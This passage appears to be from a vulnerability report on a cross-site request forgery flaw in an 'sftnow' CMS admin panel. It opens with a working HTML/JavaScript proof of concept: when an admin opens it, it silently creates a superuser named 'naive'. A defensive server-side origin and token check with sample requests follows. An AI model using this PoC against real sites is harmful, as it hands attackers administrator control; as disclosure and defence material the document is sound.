The PoC is the following code, which, when clicked by an admin, will generate a superuser account called "naive" whose password is also "naive".

```html
<html>
<script>
function AddUser() {
  var req = new XMLHttpRequest();
  // Form fields for the "add user" action; role_id[]=1 is the superuser role
  var data = "user_login=naive&user_pass=naive&user_email=admin%40qq.com&role_id%5B%5D=1";
  req.onload = reqListener;
  req.open('post', 'http://host/sftnow-master/index.php?g=Admin&m=User&a=add_post', true);
  req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  // Send the admin's session cookie along with the cross-site request
  req.withCredentials = true;
  req.send(data);
  function reqListener() {};
}
AddUser();
</script>
</html>
```
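A server-side check that would reject the request the PoC sends, as an added example that is not part of the original report or the project's own code. It assumes the admin panel is served from `https://cms.example` and that forms carry a hidden `csrf_token` field tied to the session; all function and constant names are hypothetical, and the sample requests are constructed.

```javascript
const SITE_ORIGIN = 'https://cms.example';  // assumed origin of the admin panel
const TOKEN_FIELD = 'csrf_token';           // assumed hidden form field name
const SAFE_METHODS = new Set(['GET', 'HEAD', 'OPTIONS']);

// Compare two strings without stopping at the first differing character.
function constantTimeEqual(a, b) {
  if (typeof a !== 'string' || typeof b !== 'string' || a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// req: { method, headers (lower-cased names), body (urlencoded string) }
// sessionToken: random value the server stored in the session when it rendered the form.
function checkCsrf(req, sessionToken) {
  if (SAFE_METHODS.has(req.method.toUpperCase())) return { allowed: true, reason: 'safe method' };

  // 1. Source check: browsers attach Origin to cross-site POSTs, including
  //    XHR sent with withCredentials, so a foreign origin is rejected outright.
  let source = req.headers['origin'] || null;
  if (source === null && req.headers['referer']) {
    try { source = new URL(req.headers['referer']).origin; } catch { source = 'invalid'; }
  }
  if (source !== null && source !== SITE_ORIGIN) return { allowed: false, reason: 'cross-site origin' };

  // 2. Token check: the session cookie alone is never enough; the body must
  //    also carry the per-session token, which another site cannot read.
  const submitted = new URLSearchParams(req.body).get(TOKEN_FIELD);
  if (!sessionToken || !constantTimeEqual(submitted, sessionToken)) {
    return { allowed: false, reason: 'missing or invalid token' };
  }
  return { allowed: true, reason: 'ok' };
}

// Constructed sample requests; the body is the one the PoC submits.
const SESSION_TOKEN = 'constructed-sample-token';
const POC_BODY = 'user_login=naive&user_pass=naive&user_email=admin%40qq.com&role_id%5B%5D=1';
const forged = { method: 'POST', headers: { origin: 'https://other-site.example' }, body: POC_BODY };
const forgedNoOrigin = { method: 'POST', headers: {}, body: POC_BODY };
const genuine = { method: 'POST', headers: { origin: SITE_ORIGIN },
                  body: POC_BODY + '&' + TOKEN_FIELD + '=' + SESSION_TOKEN };

for (const [name, req] of Object.entries({ forged, forgedNoOrigin, genuine })) {
  console.log(name, checkCsrf(req, SESSION_TOKEN));
}
```

Setting `SameSite=Lax` or `Strict` on the session cookie complements this check by keeping the browser from attaching the cookie to cross-site POSTs in the first place.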